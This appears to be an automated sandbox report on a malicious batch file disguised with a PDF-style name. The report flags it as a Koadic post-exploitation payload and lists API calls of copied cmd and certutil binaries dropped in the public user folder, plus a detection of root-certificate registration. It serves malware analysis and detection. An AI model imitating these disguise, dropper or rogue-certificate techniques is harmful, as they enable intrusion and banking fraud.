Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA20D660 GetDesktopWindow,LocalFree,#357,CertDuplicateCertificateContext,GetLastError,#357,#357,#357,#357,#357,#207,LocalFree,#358,#357,#358,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,7_2_00007FF6AA20D660
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2AF650 CryptHashCertificate2,SetLastError,7_2_00007FF6AA2AF650
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA283654 CryptReleaseContext,#205,GetLastError,#357,#357,SetLastError,7_2_00007FF6AA283654
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA27F644 NCryptDeleteKey,#205,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF6AA27F644
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2376B0 #359,CryptAcquireCertificatePrivateKey,GetLastError,#357,#358,#359,#358,#358,LocalFree,LocalFree,#357,CryptFindCertificateKeyProvInfo,GetLastError,#357,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF6AA2376B0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA29D6A0 CertOpenStore,GetLastError,#357,CryptMsgOpenToDecode,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,#357,LocalFree,LocalAlloc,#357,memmove,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgClose,CertCloseStore,LocalFree,LocalFree,7_2_00007FF6AA29D6A0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2A9688 CryptFindOIDInfo,#357,#360,#360,#360,7_2_00007FF6AA2A9688
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2836E8 CryptSetHashParam,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF6AA2836E8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26F6D8 #357,CryptDuplicateKey,GetLastError,CryptEncrypt,GetLastError,LocalAlloc,memmove,CryptEncrypt,GetLastError,LocalAlloc,CryptDestroyKey,LocalFree,7_2_00007FF6AA26F6D8
Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000004.00000000.1231464310.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1235221791.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1244206775.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1241022537.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1248509185.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1246282305.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1249800313.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1248949309.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.3.dr
Source: Binary string: certutil.pdb source: kn.exe, 00000007.00000000.1235987323.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1238403569.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1242588067.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1241554853.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr
Source: Binary string: cmd.pdb source: alpha.exe, 00000004.00000000.1231464310.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1235221791.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1244206775.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1241022537.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1248509185.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1246282305.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1249800313.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1248949309.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.3.dr
Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000007.00000000.1235987323.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1238403569.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1242588067.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1241554853.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD49823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,4_2_00007FF7CD49823C
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD492978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,4_2_00007FF7CD492978
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD481560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,4_2_00007FF7CD481560
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD4835B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,4_2_00007FF7CD4835B8
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD4A7B4C FindFirstFileW,FindNextFileW,FindClose,4_2_00007FF7CD4A7B4C
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD49823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,6_2_00007FF7CD49823C
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD492978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,6_2_00007FF7CD492978
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD481560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,6_2_00007FF7CD481560
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD4835B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,6_2_00007FF7CD4835B8
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD4A7B4C FindFirstFileW,FindNextFileW,FindClose,6_2_00007FF7CD4A7B4C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2C6F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,7_2_00007FF6AA2C6F80
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2C10C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,7_2_00007FF6AA2C10C4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2C3100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,7_2_00007FF6AA2C3100
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2C234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,7_2_00007FF6AA2C234C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA25C6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,7_2_00007FF6AA25C6F8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26DBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,7_2_00007FF6AA26DBC0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2C19F8 #359,FindFirstFileW,FindNextFileW,FindClose,7_2_00007FF6AA2C19F8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2C1B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,7_2_00007FF6AA2C1B04
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA265E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,7_2_00007FF6AA265E58
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,7_2_00007FF6AA26B3D8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA22D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF6AA22D440
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26D4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,7_2_00007FF6AA26D4A4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2A3674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,7_2_00007FF6AA2A3674
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD49823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,10_2_00007FF7CD49823C
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD492978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,10_2_00007FF7CD492978
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD481560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,10_2_00007FF7CD481560
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD4835B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,10_2_00007FF7CD4835B8
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD4A7B4C FindFirstFileW,FindNextFileW,FindClose,10_2_00007FF7CD4A7B4C
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD49823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,11_2_00007FF7CD49823C
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD492978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,11_2_00007FF7CD492978
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD481560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,11_2_00007FF7CD481560
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD4835B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,11_2_00007FF7CD4835B8
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD4A7B4C FindFirstFileW,FindNextFileW,FindClose,11_2_00007FF7CD4A7B4C
Source: kn.exeString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: kn.exe, 00000007.00000000.1235987323.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1238403569.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1242588067.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1241554853.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enDisallowedCertLastSyncTimePinR
Source: kn.exeString found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%ws
Source: kn.exe, 00000007.00000000.1235987323.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1238403569.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1242588067.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1241554853.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.drString found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP
Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc
Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/device/
Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/key/
Source: kn.exeString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorize
Source: kn.exe, 00000007.00000000.1235987323.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1238403569.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1242588067.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1241554853.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.drString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah
Source: kn.exeString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/token

E-Banking Fraud

barindex
Registers a new ROOT certificate
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2960BC CertCreateCertificateContext,GetLastError,#357,CertAddCertificateContextToStore,GetLastError,#357,CertCompareCertificateName,CertOpenStore,GetLastError,CertAddCertificateContextToStore,GetLastError,CertFreeCertificateContext,CertCloseStore,7_2_00007FF6AA2960BC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2429A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,7_2_00007FF6AA2429A0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26EA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,7_2_00007FF6AA26EA7C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA270F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,7_2_00007FF6AA270F58
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B6EA8 NCryptImportKey,#360,7_2_00007FF6AA2B6EA8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA280EF4 NCryptImportKey,#205,#359,#359,#357,7_2_00007FF6AA280EF4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA27E1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,7_2_00007FF6AA27E1F8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2BA740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,7_2_00007FF6AA2BA740
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2425E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,7_2_00007FF6AA2425E8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA21FC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,7_2_00007FF6AA21FC20
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA20F9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,7_2_00007FF6AA20F9B8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B93A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,7_2_00007FF6AA2B93A0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA28342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF6AA28342C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA27184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,7_2_00007FF6AA27184C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B98B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF6AA2B98B0

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: 1x40 CONTAINER.PDF-.bat, type: SAMPLEMatched rule: Koadic post-exploitation framework BAT payload Author: ditekSHen
Found large BAT file
Source: 1x40 CONTAINER.PDF-.batStatic file information: 3675586
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD483D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,4_2_00007FF7CD483D94
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD49898C NtQueryInformationToken,4_2_00007FF7CD49898C
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD4B1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,4_2_00007FF7CD4B1538
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD4989E4 NtQueryInformationToken,NtQueryInformationToken,4_2_00007FF7CD4989E4
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD4ABCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,4_2_00007FF7CD4ABCF0
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD498114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,4_2_00007FF7CD498114
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD4988C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,4_2_00007FF7CD4988C0
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD497FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,4_2_00007FF7CD497FF8
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD483D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,6_2_00007FF7CD483D94
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD49898C NtQueryInformationToken,6_2_00007FF7CD49898C
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD4B1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,6_2_00007FF7CD4B1538
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD4989E4 NtQueryInformationToken,NtQueryInformationToken,6_2_00007FF7CD4989E4
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD4ABCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,6_2_00007FF7CD4ABCF0
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD498114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,6_2_00007FF7CD498114
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD4988C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,6_2_00007FF7CD4988C0
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD497FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,6_2_00007FF7CD497FF8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2DC964 NtQuerySystemTime,RtlTimeToSecondsSince1970,7_2_00007FF6AA2DC964
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD498114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,10_2_00007FF7CD498114
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD497FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,10_2_00007FF7CD497FF8
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD483D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,10_2_00007FF7CD483D94
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD49898C NtQueryInformationToken,10_2_00007FF7CD49898C
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD4B1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,10_2_00007FF7CD4B1538
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD4989E4 NtQueryInformationToken,NtQueryInformationToken,10_2_00007FF7CD4989E4
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD4ABCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,10_2_00007FF7CD4ABCF0
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD4988C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,10_2_00007FF7CD4988C0
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD483D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,11_2_00007FF7CD483D94
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD49898C NtQueryInformationToken,11_2_00007FF7CD49898C
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD4B1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,11_2_00007FF7CD4B1538
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD4989E4 NtQueryInformationToken,NtQueryInformationToken,11_2_00007FF7CD4989E4
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD4ABCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,11_2_00007FF7CD4ABCF0
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD498114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,11_2_00007FF7CD498114
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD4988C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,11_2_00007FF7CD4988C0
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD497FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,11_2_00007FF7CD497FF8
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD485240: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,4_2_00007FF7CD485240
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD494224 InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,wcsrchr,lstrcmpW,SetConsoleMode,CreateProcessW,CloseHandle,CreateProcessAsUserW,_local_unwind,GetLastError,_local_unwind,_local_unwind,CloseHandle,DeleteProcThreadAttributeList,GetLastError,GetLastError,DeleteProcThreadAttributeList,4_2_00007FF7CD494224
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD490A6C4_2_00007FF7CD490A6C
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD4942244_2_00007FF7CD494224
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD48AA544_2_00007FF7CD48AA54
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD4955544_2_00007FF7CD495554
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD4937D84_2_00007FF7CD4937D8
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD4AEE884_2_00007FF7CD4AEE88
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD48E6804_2_00007FF7CD48E680
